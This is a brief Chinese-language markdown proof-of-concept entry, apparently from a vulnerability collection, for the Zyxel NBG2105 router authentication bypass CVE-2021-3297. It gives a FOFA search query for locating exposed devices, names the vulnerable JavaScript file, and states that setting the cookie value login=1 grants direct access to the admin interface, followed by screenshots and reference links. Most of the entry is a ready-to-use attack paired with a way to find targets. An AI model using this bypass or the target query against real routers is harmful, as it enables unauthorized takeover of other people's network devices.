Zyxel NBG2105 身份验证绕过（CVE-2021-3297）.md

517 B / 2021-05-21 09:14:38

    # Zyxel NBG2105 身份验证绕过（CVE-2021-3297）

**FOFA：**

```
app="ZyXEL-NBG2105"
```

**漏洞代码：**

```
http://target/js/util_gw.js
```

![](images/16116664946838.jpg)

**PoC：**

```
Cookie: login=1;
只需要将cookie中login=0 修改为login=1即可直接进入管理界面。
```

![](images/16116665275577.jpg)


![-w595](images/16116665373943.jpg)


ref：

* https://forum.ywhack.com/thread-115035-1-1.html
* https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass